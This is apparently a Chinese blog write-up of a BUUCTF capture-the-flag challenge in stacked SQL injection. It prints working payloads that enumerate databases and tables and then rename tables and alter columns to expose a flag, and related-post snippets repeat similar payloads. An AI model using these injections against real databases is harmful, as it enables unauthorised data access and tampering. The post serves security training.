BUUCTF [强网杯 2019]随便注 1

于 2024-09-08 22:31:01 发布
阅读量230 收藏 1
点赞数 10
文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_44761422/article/details/142034234
版权

堆叠注入看名字应该就是知道是一堆
就是多个命令一起执行(自己理解)
大多都是1’;show databases;#查询数据库(都是例子)
1’;show tables;#查询所有的表
1’;show columns from wwwww;#查询wwwww中的所有列
输入1’被过滤 报错 ,尝试报错注入
在这里插入图片描述

select被过滤
在这里插入图片描述

在这里插入图片描述
观察会发现是堆叠注入
注入时的注释符号
使用#号
有时发现执行的sql语句中没有#号
原因是url中#号是用来指导浏览器动作的(例如锚点),对服务器端完全无用。
所以,HTTP请求中不包括#
将#号改成url的编码%23就可以了
使用–和使用–+
这里发现+号在语句中变成了空格。
用来和后面的单引号分隔开,将后面的语句注释。
了解原理后便知道了–无法使用的原因,是因为–与后面的单引号连接在一起,无法形成有效的mysql语句。
在mysql中使用这个语句分析原因,输入后回车显示分号没有闭合
所以在注入时我们除了使用–+外,也可以使用–'来完成sql注入语句

1’; show databases;
在这里插入图片描述
在这里插入图片描述
1’; show tables;#
在这里插入图片描述
1’; show columns from words;#
在这里插入图片描述
1’;show columns from 1919810931114514;#
在这里插入图片描述
1’;rename table words to words1;rename table 1919810931114514 to words;alter table words change flag id varchar(100);

1’ or 1=1;#
在这里插入图片描述
flag{f1711f30-0d29-4b4f-aed8-6fd7d2b14f26}

程序菜鸡的日常
关注
BUUCTF[强网杯2019]随便
楼阁de猫的博客
09-23 582
[强网杯2019]随便 知识点:堆叠入 首先先输入一个1’,发现报错,再输入1’#,有回显,再输入1’ order by 2#,1’order by 3#,当输入3的时候发现无回显,说明入点是2,但是当我们输入1’ union select 1,2#时,发现过滤了很多关键字,这时我们就要考虑堆叠入 我们输入1’; 发现下面出现了一条横线 那应该是堆叠入了,(什么是堆叠入呢:在SQL中,分号是用来表示一条sql语句的结束。如果在 ; 结束一个sql语句后继续构造下一条语句,效果就是分别执行两
BUUCTF系列 // [强网杯2019] 随便
qq_45805420的博客
09-23 645
前言 本题知识点:SQL堆叠入 WP 打开题目,很明显的提示我们应该是SQL入了 So,先按照一般的流程,尝试基本的探测姿势 1. 探测有无入 1' 报错 1'--+ 报错 1'# 正常有回显 1' and 1=1# 正常有回显 1' and 1=2# 正常无回显 可知存在入,且 --+ 释被过滤,# 释可用 2. 尝试获取列数 1' order by 1# 正常有回显 1' order by 2# 正常有回显 1' order by 3# 报错 用 order by
buuctf 强网杯 2019 随便1
m0_63883187的博客
01-13 123
buuctf赛题日常解题
buuctf [强网杯 2019]随便 1
weixin_45642610的博客
01-07 1万+
buuctf web [强网杯 2019]随便 1 -刷题个人日记 小白一个,写给自己看。 打开后是这样。 从题目和内容来看就是一道sql入题。 输入 1' or 1=1;# 这个#用来释掉后面的sql语句 显示所有数据,这个数据有什么用我也不知道,但sql入一般第一步就是这样看看有没有有用的信息(没有)。 输入 1' order by 2;# 1' order by 3;# 到第3列报错,说明只显示两列。 输入1'; show tables;# 可以看到有 191981093
BUUCTF强网杯 2019随便1 write up
GZWZ_的博客
04-06 4910
回显flag有好几种方法,但我只会一种┭┮﹏┭┮,如果有大佬会其他的,可不可以call我呢
BUUCTF[强网杯 2019]随便 的三种解法
热门推荐
qq_44657899的博客
11-27 2万+
00X01 [强网杯 2019]随便 1’ or 1=1 #
【web | CTF】BUUCTF [强网杯 2019]随便
weixin_46301214的博客
03-09 538
2. 利用现成的select语句进行查询,先改当前表名为flag的表名,然后再改字段,再展示。然后试试叠堆入,其实叠堆入的这种题目出现很少,毕竟实际上只能运行一条sql语句的。发现这个表只有一个字段,就写着flag,那我们读取这个数据库的这个表的这列就可以了。先探测一下是不是单引号闭合,其实我一开始以为是没有引号闭合的,毕竟是数字。` ` 反引号据说是无敌的,具体原理我研究了一下也不敢确定,就不写了。测试了一下,发现的确是叠堆入,所有的数据库都爆出来了。这里有神奇的一幕,就是要用反引号以及-- q。
BUUCTF [强网杯 2019]随便
m0_63253040的博客
03-28 823
这题和[SUCTF 2019]EasySQL类似,都可以使用堆叠入 参考wp 用1' or 1=1#可以爆出所有表内容 先尝试联合查询入 过滤了select,where等等,使用堆叠入 再看表 看下1919810931114514表 发现flag在里面,但是没办法查询,先看看word表 可以看见有字段id和data,这里应猜测查询语句 selsect id,data from words where id = 根据查询语句来改掉字段的名字 ...
BUUCTF】[强网杯 2019]随便 1
qq_45972928的博客
05-06 4116
这是一个典型的sql入题目 知识点: 1、入点检测 2、万能匹配 3、暴力获得数据表和其属性 4、sql语句的掌握(order by; union select; rename table; alter table…等等) 1、进入网站 2、看到一个输入框一个提交框,尝试进行数据输入了解大致情况 经过尝试我们发现,只有输入1,2时有显示,输入0或者其他时没有显示 3、测试是否存在入 and 1=1和and 1=2没有变化 在参数后面加单引号,发现错误,可以尝试进行入 4、尝试0‘ or
[CTF-writeup] BUUCTF强网杯2019_随便
.
11-26 1000
相对于比较简单的SQL入而言,这道题在步骤上确实显得有些曲折了,因为过滤机制给我们带来了一些麻烦。但总体而言,找入点、判断闭合方式、爆破表、爆破字段的思路还是比较清晰的。笔者在这道题中的做法——对已知表的结构进行修改,也可以提供一种灵活的思路。
buuctf[强网杯 2019]随便 1(超详细,三种解法)
m0_73734159的博客
10-26 3249
网页环境判断是否是字符型入1'判断是否存在关键字过滤select联合查询被过滤,只能用堆叠入了查看有几个字段正常回显回显报错,可以看出只有两个字段查看所有数据库查看所有数据表爆words数据表的字段爆1919810931114514数据表字段(意数据表为数字的时候需要用反引号括起来);可以看到这两个表words表有两个字段,而另一个只有一个字段。
BUUCTF [强网杯 2019]随便 1(两种方法)
m0_62879498的博客
03-05 1万+
[强网杯 2019]随便 1 第一步,先判断入点的传参方式,发现是get传参。 第二步,判断闭合方式: 1’and 1=1-- q 1’and 1=2-- q 说明闭合方式为 单引号 如果输入1“and 1=1-- q 和1”and 1=2-- q 两次的回显结果一样,说明闭合方式不是 双引号 其他同理 第三步,判断是否有关键字过滤: 先直接输入: select 查看回显,发现: 发现本题过滤关键字:/select|update|delete|drop|insert|where|\.而且不区分
BUUCTF】web之强网杯2019随便
12-14
开始入: 1’ : 报错 ...# 这里意表名为数字的要加反引号 “ :在网上百度发现 得到 一个带有flag的字段 和 另一个 可查询的表 flag表:可查询表: 到这里虽然发现flag 但是select已经被ban了所
buuctf-强网杯2019随便
09-03
buuctf-强网杯2019随便是一场2019强网杯举办的CTF比赛中的一道题目。这道题目的名称暗示着它是一个与入漏洞相关的题目。 入漏洞是一种网络安全漏洞,攻击者可以通过在用户输入的数据中入恶意代码来获取...
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8550
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
微信Java开发工具包,支持包括微信支付、开放平台、公众号、企业微信、视频号、小程序等微信功能模块的后端开发
11-15
微信Java开发工具包,支持包括微信支付、开放平台、公众号、企业微信、视频号、小程序等微信功能模块的后端开发。
如何制作MC(需要下载海龟编辑器2.0,下载pyglet==1.5.15)
11-15
如何制作MC(需要下载海龟编辑器2.0,下载pyglet==1.5.15)
民宿预订管理系统 SSM毕业设计 附带论文.zip
11-15
民宿预订管理系统 SSM毕业设计 附带论文 启动教程:https://www.bilibili.com/video/BV1GK1iYyE2B
matlab常微分方程和常微分方程组的求解.docx
最新发布
11-15
内容概要:本文详细介绍了如何利用MATLAB解决各种类型的常微分方程(组),包括解析解和数值解的方法,并给出了具体的实例以及求解步骤。重点探讨了dsolve()函数的使用来获取方程的符号解,以及各类Solver命令如ode45、ode23等用于求数值解的特点与适用情况。 适合人群:高校理工科专业学生、科研工作者,尤其对数学建模感兴趣的研究人士。 使用场景及目标:帮助用户理解和应用MATLAB解决实际工程和科学研究中的微分方程问题,提升问题解决效率。 其他说明:除了理论介绍外,文档还提供了多个实际案例及其相应的MATLAB脚本供参考和练习,有助于加深理解和提高动手能力。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值